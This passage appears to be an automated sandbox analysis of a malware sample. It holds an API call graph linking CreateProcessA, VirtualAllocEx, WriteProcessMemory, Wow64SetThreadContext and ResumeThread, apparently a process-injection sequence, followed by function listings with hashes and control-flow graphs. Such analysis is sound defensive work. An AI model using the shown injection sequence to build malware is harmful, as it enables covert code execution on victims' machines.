32536->32547 32537 133b1e7 32537->32519 32540 133b1d8 32539->32540 32542 133b2bf 2 API calls 32540->32542 32541 133b1e7 32541->32519 32542->32541 32544 133b1d9 32543->32544 32546 133b2bf 2 API calls 32544->32546 32545 133b1e7 32545->32519 32546->32545 32548 133b2e1 32547->32548 32550 133b304 32547->32550 32548->32550 32555 133b568 32548->32555 32559 133b558 32548->32559 32549 133b2fc 32549->32550 32551 133b508 GetModuleHandleW 32549->32551 32550->32537 32552 133b535 32551->32552 32552->32537 32556 133b57c 32555->32556 32558 133b5a1 32556->32558 32563 133afe8 32556->32563 32558->32549 32560 133b568 32559->32560 32561 133b5a1 32560->32561 32562 133afe8 LoadLibraryExW 32560->32562 32561->32549 32562->32561 32564 133b748 LoadLibraryExW 32563->32564 32566 133b7c1 32564->32566 32566->32558 32568 133d455 32567->32568 32570 133d48f 32568->32570 32580 133d270 32568->32580 32570->32525 32572 133d455 32571->32572 32573 133d270 2 API calls 32572->32573 32574 133d48f 32572->32574 32573->32574 32574->32525 32576 133d460 32575->32576 32577 133d4d5 32575->32577 32578 133d48f 32576->32578 32579 133d270 2 API calls 32576->32579 32577->32525 32578->32525 32579->32578 32581 133d27b 32580->32581 32583 133dda0 32581->32583 32584 133d39c 32581->32584 32583->32583 32585 133d3a7 32584->32585 32586 133725c 2 API calls 32585->32586 32587 133de0f 32586->32587 32587->32583 32595 8127abf 32596 8127a86 32595->32596 32597 8127acd 32595->32597 32597->32596 32601 8128450 32597->32601 32619 81284ae 32597->32619 32639 8128440 32597->32639 32602 812846a 32601->32602 32658 8128999 32602->32658 32663 8128a5b 32602->32663 32668 8128fba 32602->32668 32673 812891a 32602->32673 32677 8128bb7 32602->32677 32681 812896f 32602->32681 32686 812902e 32602->32686 32690 8128e2a 32602->32690 32694 8128c25 32602->32694 32699 8128b25 32602->32699 32707 8128865 32602->32707 32712 8128fe4 32602->32712 32717 8128a00 32602->32717 32722 8128cbd 32602->32722 32727 8128a3e 32602->32727 32621 81284b1 32619->32621 32622 812843c 32619->32622 32620 8128406 32620->32596 32621->32596 32622->32620 32624 8128bb7 2 API calls 32622->32624 32625 812891a 2 API calls 32622->32625 32626 8128fba 2 API calls 32622->32626 32627 8128a5b 2 API calls 32622->32627 32628 8128999 2 API calls 32622->32628 32629 8128a3e 2 API calls 32622->32629 32630 8128cbd 2 API calls 32622->32630 32631 8128a00 2 API calls 32622->32631 32632 8128fe4 2 API calls 32622->32632 32633 8128865 2 API calls 32622->32633 32634 8128b25 4 API calls 32622->32634 32635 8128c25 2 API calls 32622->32635 32636 8128e2a 2 API calls 32622->32636 32637 812902e 2 API calls 32622->32637 32638 812896f 2 API calls 32622->32638 32623 812848e 32623->32596 32624->32623 32625->32623 32626->32623 32627->32623 32628->32623 32629->32623 32630->32623 32631->32623 32632->32623 32633->32623 32634->32623 32635->32623 32636->32623 32637->32623 32638->32623 32640 8128406 32639->32640 32641 812844a 32639->32641 32640->32596 32643 8128bb7 2 API calls 32641->32643 32644 812891a 2 API calls 32641->32644 32645 8128fba 2 API calls 32641->32645 32646 8128a5b 2 API calls 32641->32646 32647 8128999 2 API calls 32641->32647 32648 8128a3e 2 API calls 32641->32648 32649 8128cbd 2 API calls 32641->32649 32650 8128a00 2 API calls 32641->32650 32651 8128fe4 2 API calls 32641->32651 32652 8128865 2 API calls 32641->32652 32653 8128b25 4 API calls 32641->32653 32654 8128c25 2 API calls 32641->32654 32655 8128e2a 2 API calls 32641->32655 32656 812902e 2 API calls 32641->32656 32657 812896f 2 API calls 32641->32657 32642 812848e 32642->32596 32643->32642 32644->32642 32645->32642 32646->32642 32647->32642 32648->32642 32649->32642 32650->32642 32651->32642 32652->32642 32653->32642 32654->32642 32655->32642 32656->32642 32657->32642 32659 812897b 32658->32659 32732 81273e1 32659->32732 32736 81273e8 32659->32736 32660 8128f0f 32664 8128a46 32663->32664 32740 81271a0 32664->32740 32744 8127198 32664->32744 32665 8129306 32669 8128fc0 32668->32669 32671 81271a0 ResumeThread 32669->32671 32672 8127198 ResumeThread 32669->32672 32670 8129306 32671->32670 32672->32670 32674 8128950 32673->32674 32748 8127670 32673->32748 32752 8127664 32673->32752 32679 81273e1 WriteProcessMemory 32677->32679 32680 81273e8 WriteProcessMemory 32677->32680 32678 812848e 32678->32596 32679->32678 32680->32678 32682 812897b 32681->32682 32684 81273e1 WriteProcessMemory 32682->32684 32685 81273e8 WriteProcessMemory 32682->32685 32683 8128f0f 32684->32683 32685->32683 32756 8127250 32686->32756 32760 8127248 32686->32760 32687 8129048 32692 8127250 Wow64SetThreadContext 32690->32692 32693 8127248 Wow64SetThreadContext 32690->32693 32691 8128e44 32692->32691 32693->32691 32695 8128c32 32694->32695 32697 81273e1 WriteProcessMemory 32695->32697 32698 81273e8 WriteProcessMemory 32695->32698 32696 812911e 32697->32696 32698->32696 32764 81274d8 32699->32764 32768 81274d0 32699->32768 32700 8128ba1 32701 812897b 32701->32700 32705 81273e1 WriteProcessMemory 32701->32705 32706 81273e8 WriteProcessMemory 32701->32706 32702 8128f0f 32705->32702 32706->32702 32708 8128897 32707->32708 32710 8127670 CreateProcessA 32708->32710 32711 8127664 CreateProcessA 32708->32711 32709 8128950 32710->32709 32711->32709 32713 8128fd1 32712->32713 32715 81271a0 ResumeThread 32713->32715 32716 8127198 ResumeThread 32713->32716 32714 8129306 32715->32714 32716->32714 32718 812897b 32717->32718 32720 81273e1 WriteProcessMemory 32718->32720 32721 81273e8 WriteProcessMemory 32718->32721 32719 8128f0f 32720->32719 32721->32719 32723 8128ff0 32722->32723 32772 8127321 32723->32772 32776 8127328 32723->32776 32724 812900e 32728 8128a4b 32727->32728 32730 81271a0 ResumeThread 32728->32730 32731 8127198 ResumeThread 32728->32731 32729 8129306 32729->32729 32730->32729 32731->32729 32733 81273e8 WriteProcessMemory 32732->32733 32735 8127487 32733->32735 32735->32660 32737 8127430 WriteProcessMemory 32736->32737 32739 8127487 32737->32739 32739->32660 32741 81271e0 ResumeThread 32740->32741 32743 8127211 32741->32743 32743->32665 32745 81271a0 ResumeThread 32744->32745 32747 8127211 32745->32747 32747->32665 32749 81276f9 32748->32749 32749->32749 32750 812785e CreateProcessA 32749->32750 32751 81278bb 32750->32751 32753 8127669 CreateProcessA 32752->32753 32755 81278bb 32753->32755 32757 8127295 Wow64SetThreadContext 32756->32757 32759 81272dd 32757->32759 32759->32687 32761 8127295 Wow64SetThreadContext 32760->32761 32763 81272dd 32761->32763 32763->32687 32765 8127523 ReadProcessMemory 32764->32765 32767 8127567 32765->32767 32767->32701 32769 8127523 ReadProcessMemory 32768->32769 32771 8127567 32769->32771 32771->32701 32773 8127368 VirtualAllocEx 32772->32773 32775 81273a5 32773->32775 32775->32724 32777 8127368 VirtualAllocEx 32776->32777 32779 81273a5 32777->32779 32779->32724

                              Executed Functions

                              Function 07E70040 Relevance: 16.2, Strings: 12, Instructions: 1177COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1790374815.0000000007E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E70000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7e70000_SecuriteInfo.jbxd
                              Similarity
                              • API ID:
                              • String ID: (_^q$(_^q$,bq$4c^q$4c^q$Hbq$Nv]q$$^q$$^q$$^q$c^q$c^q
                              • API String ID: 0-692146702
                              • Opcode ID: c46d68e244b10bdd696e917b2a3fb25e94c87203580d94ec803353b3cb76ad47
                              • Instruction ID: a65e73265c08671899a7a2f61846166ff4c85c0d21e101c6392568528106e040
                              • Opcode Fuzzy Hash: c46d68e244b10bdd696e917b2a3fb25e94c87203580d94ec803353b3cb76ad47
                              • Instruction Fuzzy Hash: 338296B0B511198FCB59EBBD845027D66E3BFCDB00B6058A9D00ADB394EE35DC878B91
                              Function 07E74270 Relevance: 15.1, Strings: 10, Instructions: 2597COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1790374815.0000000007E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E70000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7e70000_SecuriteInfo.jbxd
                              Similarity
                              • API ID:
                              • String ID: (o^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4|cq$4|cq$$^q
                              • API String ID: 0-2723476363
                              • Opcode ID: 592b2a300071375b21f7cd93ff5ec90d90c044aabfb49a88fd81bfbd07b38416
                              • Instruction ID: 1ddc1dfb2fb18057d2249b617c7dff33e33f0e8fea3196e1aacd544e2aa473cd
                              • Opcode Fuzzy Hash: 592b2a300071375b21f7cd93ff5ec90d90c044aabfb49a88fd81bfbd07b38416
                              • Instruction Fuzzy Hash: 3743F9B4A01619CFCB24DF28C988A9DBBB2FF49314F159595E409AB3A5DB30ED91CF40
                              Function 07E73280 Relevance: 7.1, Strings: 5, Instructions: 827COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1790374815.0000000007E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E70000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7e70000_SecuriteInfo.jbxd
                              Similarity
                              • API ID:
                              • String ID: (o^q$(o^q$,bq$,bq$Hbq
                              • API String ID: 0-3486158592
                              • Opcode ID: d02e0d7e54a5274ac7c80f1b684bcf61e0e8c0458b632a005f2a62f54d7e6762
                              • Instruction ID: c237dc1a5f74c6df81901157473229a2b53bad4a35e35302a5521fe9b93e645d
                              • Opcode Fuzzy Hash: d02e0d7e54a5274ac7c80f1b684bcf61e0e8c0458b632a005f2a62f54d7e6762
                              • Instruction Fuzzy Hash: C762C2B1B01156DFCB54DF69C484AAEBBB2BF88714F159129E806DB3A4CB31EC41DB90
                              Function 08121E0C Relevance: .1, Instructions: 63COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1792374977.0000000008120000.00000040.00000800.00020000.00000000.sdmp, Offset: 08120000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8120000_SecuriteInfo.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: b2a057d6b8d956a458df66c105f75fada4db0da857b84623cee4efa3ddb3b293
                              • Instruction ID: bb1eef77ad57a49568596da4d54521e8a42dce5f36aab7536ec2ced97fd437b3
                              • Opcode Fuzzy Hash: b2a057d6b8d956a458df66c105f75fada4db0da857b84623cee4efa3ddb3b293
                              • Instruction Fuzzy Hash: 9621E4B0D056189BEB19CFAAD8447DEFEF6AFC8310F14C06AD409B6264DB7505498F60
                              Function 08121E10 Relevance: .1, Instructions: 61COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1792374977.0000000008120000.00000040.00000800.00020000.00000000.sdmp, Offset: 08120000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8120000_SecuriteInfo.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 3e1ad351e0e841566d658bba74aca215a7a88596c203f9234e26e431095fdaa8
                              • Instruction ID: d0e1bae157946d04c10fb196ed04e41f3aaf6d418ba3086df876173b98329ce0
                              • Opcode Fuzzy Hash: 3e1ad351e0e841566d658bba74aca215a7a88596c203f9234e26e431095fdaa8
                              • Instruction Fuzzy Hash: 1E21D5B0D04618DBEB18CF97D8447DEFAF6AFC8310F14C06AD40976254DB7505458F60
                              Function 07E78DC5 Relevance: 15.2, Strings: 12, Instructions: 241COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 723 7e78dc5 724 7e78dca-7e78dcd 723->724 725 7e78ddf-7e78dee 724->725 726 7e78dcf 724->726 745 7e78e06-7e78e23 725->745 746 7e78df0-7e78df5 725->746 726->725 727 7e79156-7e7916a 726->727 728 7e78e94-7e78ea7 726->728 729 7e79052-7e79056 726->729 730 7e78f40-7e78f4f 726->730 731 7e79010-7e79023 726->731 732 7e78fef-7e78ff9 726->732 733 7e7916d-7e79176 726->733 734 7e790cb 726->734 735 7e78f6b-7e78f7e 726->735 736 7e7904b-7e7904d 726->736 737 7e78f19-7e78f3d 726->737 762 7e78eca 728->762 763 7e78ea9-7e78eb2 728->763 739 7e79079 729->739 740 7e79058-7e79061 729->740 741 7e78f55-7e78f5e 730->741 742 7e79179-7e7918a 730->742 765 7e79025-7e7902f 731->765 766 7e79044-7e79049 731->766 732->742 743 7e78fff-7e7900b 732->743 734->727 735->742 761 7e78f84-7e78f99 735->761 736->724 737->730 751 7e7907c-7e79083 739->751 748 7e79063-7e79066 740->748 749 7e79068-7e79075 740->749 752 7e78f63-7e78f66 741->752 753 7e78f60 741->753 743->724 778 7e78e46 745->778 779 7e78e25-7e78e2e 745->779 756 7e78df6 746->756 757 7e78e6c-7e78e72 call 7e79f4f 746->757 758 7e79077 748->758 749->758 759 7e79085-7e79097 751->759 760 7e79099 751->760 752->724 753->752 767 7e78df7-7e78df8 756->767 768 7e78dfa-7e78dfc 756->768 781 7e78e78-7e78e82 757->781 758->751 771 7e7909c-7e790a9 759->771 760->771 789 7e78fb7 761->789 790 7e78f9b-7e78fa1 761->790 773 7e78ecd-7e78ed1 762->773 774 7e78eb4-7e78eb7 763->774 775 7e78eb9-7e78ec6 763->775 765->742 776 7e79035-7e7903c 765->776 766->736 777 7e7903f 766->777 767->745 768->745 796 7e790c1-7e790c6 771->796 797 7e790ab-7e790b1 771->797 783 7e78ed3-7e78edc 773->783 784 7e78ef2 773->784 782 7e78ec8 774->782 775->782 776->777 777->724 785 7e78e49-7e78e69 778->785 787 7e78e35-7e78e42 779->787 788 7e78e30-7e78e33 779->788 781->742 792 7e78e88-7e78e8f 781->792 782->773 794 7e78ee3-7e78ee6 783->794 795 7e78ede-7e78ee1 783->795 793 7e78ef5-7e78f14 784->793 785->757 798 7e78e44 787->798 788->798 799 7e78fb9-7e78fbb 789->799 800 7e78fa7-7e78fb3 790->800 801 7e78fa3-7e78fa5 790->801 792->724 793->724 802 7e78ef0 794->802 795->802 796->724 804 7e790b5-7e790b7 797->804 805 7e790b3 797->805 798->785 808 7e78fd5-7e78fea 799->808 809 7e78fbd-7e78fc3 799->809 807 7e78fb5 800->807 801->807 802->793 804->796 805->796 807->799 808->724 812 7e78fc7-7e78fd3 809->812 813 7e78fc5 809->813 812->808 813->808
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1790374815.0000000007E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E70000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7e70000_SecuriteInfo.jbxd
                              Similarity
                              • API ID:
                              • String ID: fcq$ fcq$Te^q$Te^q$XX^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                              • API String ID: 0-179644157
                              • Opcode ID: 3249dda3b34142b80972cab14f3ca40adfba88555329d20f1a8b1443a00d0a76
                              • Instruction ID: 18816080cff1a42719279b44398e809a37e2085ffd6c11e4100290082ead7bee
                              • Opcode Fuzzy Hash: 3249dda3b34142b80972cab14f3ca40adfba88555329d20f1a8b1443a00d0a76
                              • Instruction Fuzzy Hash: 6791D2B0F11219CFCB18CAA5D848AADB7B2FF95705F24991AE502AF395CB349C85CB50
                              Function 07E77850 Relevance: 12.9, Strings: 10, Instructions: 396COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1586 7e77850-7e77888 1587 7e77893-7e778f2 call 7e7748c 1586->1587 1726 7e7788d call 7e77e72 1586->1726 1727 7e7788d call 7e77e80 1586->1727 1597 7e778f5 1587->1597 1598 7e778fa-7e778fd 1597->1598 1599 7e77906-7e7790c 1598->1599 1600 7e778ff 1598->1600 1612 7e77912-7e7791e 1599->1612 1613 7e7790e-7e77910 1599->1613 1600->1599 1601 7e77a97-7e77aa4 1600->1601 1602 7e779e6-7e77a52 1600->1602 1603 7e779d4-7e779d6 1600->1603 1604 7e779a2-7e779cc 1600->1604 1605 7e77ae1-7e77ae5 1600->1605 1606 7e77b30 1600->1606 1607 7e7794f-7e77959 1600->1607 1608 7e77aac 1600->1608 1609 7e7796b-7e7796d 1600->1609 1610 7e77b1b-7e77b28 1600->1610 1611 7e77a6a-7e77a79 1600->1611 1601->1608 1628 7e77a59 1602->1628 1603->1597 1616 7e779dc-7e779e1 1603->1616 1604->1603 1614 7e77ae7-7e77af0 1605->1614 1615 7e77b06 1605->1615 1617 7e77b38-7e77b3b 1606->1617 1619 7e77a54 1607->1619 1620 7e7795f-7e77969 1607->1620 1624 7e77ad5-7e77ad8 1608->1624 1621 7e7796f-7e77976 1609->1621 1622 7e7798a-7e77991 1609->1622 1610->1606 1652 7e77a90-7e77a95 1611->1652 1653 7e77a7b-7e77a85 1611->1653 1618 7e77920-7e77945 1612->1618 1613->1618 1625 7e77af7-7e77afa 1614->1625 1626 7e77af2-7e77af5 1614->1626 1637 7e77b09-7e77b0b 1615->1637 1616->1598 1630 7e77b4d-7e77b66 1617->1630 1631 7e77b3d 1617->1631 1671 7e7794d 1618->1671 1619->1628 1620->1598 1621->1619 1636 7e7797c-7e77980 1621->1636 1622->1619 1633 7e77997-7e779a0 1622->1633 1624->1605 1638 7e77ada 1624->1638 1639 7e77b04 1625->1639 1626->1639 1649 7e77a5e-7e77a61 1628->1649 1674 7e77b71-7e77b78 1630->1674 1631->1630 1642 7e77db1-7e77db6 1631->1642 1643 7e77cde-7e77ce3 1631->1643 1644 7e77c1d-7e77c24 1631->1644 1645 7e77b4c 1631->1645 1646 7e77c3b-7e77c3f 1631->1646 1647 7e77dbb-7e77dd0 1631->1647 1648 7e77ce8-7e77cfb 1631->1648 1633->1604 1650 7e77985 1633->1650 1636->1650 1640 7e77b14-7e77b19 1637->1640 1641 7e77b0d 1637->1641 1638->1605 1638->1606 1638->1610 1638->1630 1638->1642 1638->1643 1638->1644 1638->1646 1638->1647 1638->1648 1639->1637 1640->1610 1654 7e77b12 1640->1654 1641->1654 1655 7e77c2a-7e77c36 1644->1655 1656 7e77de9-7e77df2 1644->1656 1645->1630 1658 7e77c62 1646->1658 1659 7e77c41-7e77c4a 1646->1659 1728 7e77dd2 call 7e7f021 1647->1728 1729 7e77dd2 call 7e7f030 1647->1729 1732 7e77d00 call 7e7c504 1648->1732 1733 7e77d00 call 7e7c4e4 1648->1733 1734 7e77d00 call 7e7c4f4 1648->1734 1735 7e77d00 call 7e7dc09 1648->1735 1736 7e77d00 call 7e7c478 1648->1736 1737 7e77d00 call 7e7dc98 1648->1737 1649->1611 1663 7e77a63 1649->1663 1650->1598 1652->1601 1662 7e77a8e 1652->1662 1664 7e77a87 1653->1664 1665 7e77aaf-7e77ad0 1653->1665 1654->1624 1655->1617 1668 7e77c65-7e77cc3 1658->1668 1666 7e77c51-7e77c5e 1659->1666 1667 7e77c4c-7e77c4f 1659->1667 1662->1649 1663->1601 1663->1605 1663->1606 1663->1608 1663->1610 1663->1611 1663->1630 1663->1642 1663->1643 1663->1644 1663->1646 1663->1647 1663->1648 1664->1662 1665->1624 1672 7e77c60 1666->1672 1667->1672 1710 7e77cc5-7e77ccb 1668->1710 1711 7e77cdb 1668->1711 1671->1607 1672->1668 1679 7e77b9b 1674->1679 1680 7e77b7a-7e77b83 1674->1680 1684 7e77b9e-7e77c02 1679->1684 1686 7e77b85-7e77b88 1680->1686 1687 7e77b8a-7e77b97 1680->1687 1683 7e77d06 1730 7e77d08 call 7e7e5a8 1683->1730 1731 7e77d08 call 7e7e5b8 1683->1731 1718 7e77c04-7e77c0a 1684->1718 1719 7e77c1a 1684->1719 1689 7e77b99 1686->1689 1687->1689 1689->1684 1690 7e77dd8 1699 7e77ddf-7e77de6 1690->1699 1691 7e77d0e-7e77d15 1695 7e77d17-7e77d20 1691->1695 1696 7e77d38 1691->1696 1700 7e77d27-7e77d34 1695->1700 1701 7e77d22-7e77d25 1695->1701 1698 7e77d3b-7e77d9c 1696->1698 1724 7e77da2-7e77dae 1698->1724 1703 7e77d36 1700->1703 1701->1703 1703->1698 1714 7e77ccf-7e77cd1 1710->1714 1715 7e77ccd 1710->1715 1711->1643 1714->1711 1715->1711 1720 7e77c0e-7e77c10 1718->1720 1721 7e77c0c 1718->1721 1719->1644 1720->1719 1721->1719 1724->1642 1726->1587 1727->1587 1728->1690 1729->1690 1730->1691 1731->1691 1732->1683 1733->1683 1734->1683 1735->1683 1736->1683 1737->1683
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1790374815.0000000007E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E70000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7e70000_SecuriteInfo.jbxd
                              Similarity
                              • API ID:
                              • String ID: Te^q$Te^q$Te^q$Te^q$Te^q$Te^q$$^q$$^q$$^q$$^q
                              • API String ID: 0-1911786396
                              • Opcode ID: d8f304d0a0d66dee9d15e17805f516553aefa9abccd38571b70d9bc0d6a0825a
                              • Instruction ID: ce25c842ea5858f67b17e42612e634781a7bb42f799b498ca4160c1aa1c03a12
                              • Opcode Fuzzy Hash: d8f304d0a0d66dee9d15e17805f516553aefa9abccd38571b70d9bc0d6a0825a
                              • Instruction Fuzzy Hash: 12E1D270F41209DFDB149B78D858BAE7BF2BB89710F209825E542AB384DF749C85CB90
                              Function 07E77840 Relevance: 10.4, Strings: 8, Instructions: 357COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1738 7e77840-7e77845 1739 7e77847-7e77888 1738->1739 1740 7e777e8-7e7782c 1738->1740 1891 7e7788d call 7e77e72 1739->1891 1892 7e7788d call 7e77e80 1739->1892 1742 7e77893 1743 7e7789d 1742->1743 1744 7e778a5-7e778f2 call 7e7748c 1743->1744 1752 7e778f5 1744->1752 1753 7e778fa-7e778fd 1752->1753 1754 7e77906-7e7790c 1753->1754 1755 7e778ff 1753->1755 1767 7e77912-7e7791e 1754->1767 1768 7e7790e-7e77910 1754->1768 1755->1754 1756 7e77a97-7e77aa4 1755->1756 1757 7e779e6-7e77a52 1755->1757 1758 7e779d4-7e779d6 1755->1758 1759 7e779a2-7e779cc 1755->1759 1760 7e77ae1-7e77ae5 1755->1760 1761 7e77b30 1755->1761 1762 7e7794f-7e77959 1755->1762 1763 7e77aac 1755->1763 1764 7e7796b-7e7796d 1755->1764 1765 7e77b1b-7e77b28 1755->1765 1766 7e77a6a-7e77a79 1755->1766 1756->1763 1783 7e77a59 1757->1783 1758->1752 1771 7e779dc-7e779e1 1758->1771 1759->1758 1769 7e77ae7-7e77af0 1760->1769 1770 7e77b06 1760->1770 1772 7e77b38-7e77b3b 1761->1772 1774 7e77a54 1762->1774 1775 7e7795f-7e77969 1762->1775 1779 7e77ad5-7e77ad8 1763->1779 1776 7e7796f-7e77976 1764->1776 1777 7e7798a-7e77991 1764->1777 1765->1761 1807 7e77a90-7e77a95 1766->1807 1808 7e77a7b-7e77a85 1766->1808 1773 7e77920-7e77923 1767->1773 1768->1773 1780 7e77af7-7e77afa 1769->1780 1781 7e77af2-7e77af5 1769->1781 1792 7e77b09-7e77b0b 1770->1792 1771->1753 1785 7e77b4d-7e77b52 1772->1785 1786 7e77b3d 1772->1786 1806 7e7792d-7e77945 1773->1806 1774->1783 1775->1753 1776->1774 1791 7e7797c-7e77980 1776->1791 1777->1774 1788 7e77997-7e779a0 1777->1788 1779->1760 1793 7e77ada 1779->1793 1794 7e77b04 1780->1794 1781->1794 1804 7e77a5e-7e77a61 1783->1804 1816 7e77b5a-7e77b66 1785->1816 1786->1785 1797 7e77db1-7e77db6 1786->1797 1798 7e77cde-7e77ce3 1786->1798 1799 7e77c1d-7e77c24 1786->1799 1800 7e77b4c 1786->1800 1801 7e77c3b-7e77c3f 1786->1801 1802 7e77dbb-7e77dc8 1786->1802 1803 7e77ce8-7e77cfb 1786->1803 1788->1759 1805 7e77985 1788->1805 1791->1805 1795 7e77b14-7e77b19 1792->1795 1796 7e77b0d 1792->1796 1793->1760 1793->1761 1793->1765 1793->1785 1793->1797 1793->1798 1793->1799 1793->1801 1793->1802 1793->1803 1794->1792 1795->1765 1809 7e77b12 1795->1809 1796->1809 1810 7e77c2a-7e77c36 1799->1810 1811 7e77de9-7e77df2 1799->1811 1800->1785 1813 7e77c62 1801->1813 1814 7e77c41-7e77c4a 1801->1814 1836 7e77dd0 1802->1836 1885 7e77d00 call 7e7c504 1803->1885 1886 7e77d00 call 7e7c4e4 1803->1886 1887 7e77d00 call 7e7c4f4 1803->1887 1888 7e77d00 call 7e7dc09 1803->1888 1889 7e77d00 call 7e7c478 1803->1889 1890 7e77d00 call 7e7dc98 1803->1890 1804->1766 1818 7e77a63 1804->1818 1805->1753 1826 7e7794d 1806->1826 1807->1756 1817 7e77a8e 1807->1817 1819 7e77a87 1808->1819 1820 7e77aaf-7e77ad0 1808->1820 1809->1779 1810->1772 1823 7e77c65-7e77cc3 1813->1823 1821 7e77c51-7e77c5e 1814->1821 1822 7e77c4c-7e77c4f 1814->1822 1829 7e77b71-7e77b78 1816->1829 1817->1804 1818->1756 1818->1760 1818->1761 1818->1763 1818->1765 1818->1766 1818->1785 1818->1797 1818->1798 1818->1799 1818->1801 1818->1802 1818->1803 1819->1817 1820->1779 1827 7e77c60 1821->1827 1822->1827 1865 7e77cc5-7e77ccb 1823->1865 1866 7e77cdb 1823->1866 1826->1762 1827->1823 1834 7e77b9b 1829->1834 1835 7e77b7a-7e77b83 1829->1835 1839 7e77b9e-7e77c02 1834->1839 1841 7e77b85-7e77b88 1835->1841 1842 7e77b8a-7e77b97 1835->1842 1881 7e77dd2 call 7e7f021 1836->1881 1882 7e77dd2 call 7e7f030 1836->1882 1838 7e77d06 1883 7e77d08 call 7e7e5a8 1838->1883 1884 7e77d08 call 7e7e5b8 1838->1884 1873 7e77c04-7e77c0a 1839->1873 1874 7e77c1a 1839->1874 1844 7e77b99 1841->1844 1842->1844 1844->1839 1845 7e77dd8 1854 7e77ddf-7e77de6 1845->1854 1846 7e77d0e-7e77d15 1850 7e77d17-7e77d20 1846->1850 1851 7e77d38 1846->1851 1855 7e77d27-7e77d34 1850->1855 1856 7e77d22-7e77d25 1850->1856 1853 7e77d3b-7e77d84 1851->1853 1878 7e77d8e-7e77d9c 1853->1878 1858 7e77d36 1855->1858 1856->1858 1858->1853 1869 7e77ccf-7e77cd1 1865->1869 1870 7e77ccd 1865->1870 1866->1798 1869->1866 1870->1866 1875 7e77c0e-7e77c10 1873->1875 1876 7e77c0c 1873->1876 1874->1799 1875->1874 1876->1874 1879 7e77da2-7e77dae 1878->1879 1879->1797 1881->1845 1882->1845 1883->1846 1884->1846 1885->1838 1886->1838 1887->1838 1888->1838 1889->1838 1890->1838 1891->1742 1892->1742
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1790374815.0000000007E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E70000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7e70000_SecuriteInfo.jbxd
                              Similarity
                              • API ID:
                              • String ID: Te^q$Te^q$Te^q$Te^q$Te^q$Te^q$$^q$$^q
                              • API String ID: 0-1586662440
                              • Opcode ID: 48c97f584e0d86f514be6a3ec78ece72bd2162bdfefd000b2fac0790f9d4d610
                              • Instruction ID: 7b870739091b3dcb19ed9bc8acfde055ec47f02faef15bb8bbf9d35f27458d53
                              • Opcode Fuzzy Hash: 48c97f584e0d86f514be6a3ec78ece72bd2162bdfefd000b2fac0790f9d4d610
                              • Instruction Fuzzy Hash: 69D1D3B0F55205DFDB048B78D459BBD7BB2BB89711F209429E942EB384DB749C41CB90
                              Function 07E78DE9 Relevance: 10.2, Strings: 8, Instructions: 203COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1893 7e78de9-7e78dee 1894 7e78e06-7e78e23 1893->1894 1895 7e78df0-7e78df5 1893->1895 1902 7e78e46 1894->1902 1903 7e78e25-7e78e2e 1894->1903 1896 7e78df6 1895->1896 1897 7e78e6c-7e78e72 call 7e79f4f 1895->1897 1898 7e78df7-7e78df8 1896->1898 1899 7e78dfa-7e78dfc 1896->1899 1901 7e78e78-7e78e82 1897->1901 1898->1894 1899->1894 1904 7e79179-7e7918a 1901->1904 1905 7e78e88-7e78e8f 1901->1905 1906 7e78e49-7e78e69 1902->1906 1907 7e78e35-7e78e42 1903->1907 1908 7e78e30-7e78e33 1903->1908 1909 7e78dca-7e78dcd 1905->1909 1906->1897 1910 7e78e44 1907->1910 1908->1910 1913 7e78ddf-7e78de2 1909->1913 1914 7e78dcf 1909->1914 1910->1906 1913->1893 1914->1913 1916 7e79156-7e7916a 1914->1916 1917 7e78e94-7e78ea7 1914->1917 1918 7e79052-7e79056 1914->1918 1919 7e78f40-7e78f4f 1914->1919 1920 7e79010-7e79023 1914->1920 1921 7e78fef-7e78ff9 1914->1921 1922 7e7916d-7e79176 1914->1922 1923 7e790cb 1914->1923 1924 7e78f6b-7e78f7e 1914->1924 1925 7e7904b-7e7904d 1914->1925 1926 7e78f19-7e78f3d 1914->1926 1942 7e78eca 1917->1942 1943 7e78ea9-7e78eb2 1917->1943 1927 7e79079 1918->1927 1928 7e79058-7e79061 1918->1928 1919->1904 1929 7e78f55-7e78f5e 1919->1929 1947 7e79025-7e7902f 1920->1947 1948 7e79044-7e79049 1920->1948 1921->1904 1930 7e78fff-7e7900b 1921->1930 1923->1916 1924->1904 1946 7e78f84-7e78f99 1924->1946 1925->1909 1926->1919 1936 